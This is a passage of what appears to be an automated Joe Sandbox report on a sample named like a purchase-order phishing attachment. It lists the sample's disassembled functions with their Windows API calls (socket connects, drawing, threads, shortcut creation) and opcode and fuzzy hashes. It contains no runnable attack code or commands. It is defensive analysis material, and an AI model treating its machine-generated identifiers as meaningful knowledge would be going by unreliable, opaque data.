                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 3087257052-0
                                                            • Opcode ID: 044dc1d4464e5a3e34bbd85584dcc81f53abd7c79c998fa19c85a06668655aa2
                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                            • Opcode Fuzzy Hash: 044dc1d4464e5a3e34bbd85584dcc81f53abd7c79c998fa19c85a06668655aa2
                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                            Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 245547762-0
                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                            Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                            • String ID:
                                                            • API String ID: 2338827641-0
                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                            Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                            Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                            Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 4023252218-0
                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                            Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 1489400265-0
                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                            Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1042038666-0
                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                            Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                            Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041780F
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __getptd.LIBCMT ref: 00417826
                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                            • __lock.LIBCMT ref: 00417844
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                            Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 2403457894-0
                                                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                            Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 4247068974-0
                                                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                            Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$U$\
                                                            • API String ID: 0-3705770531
                                                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                            Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                            Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
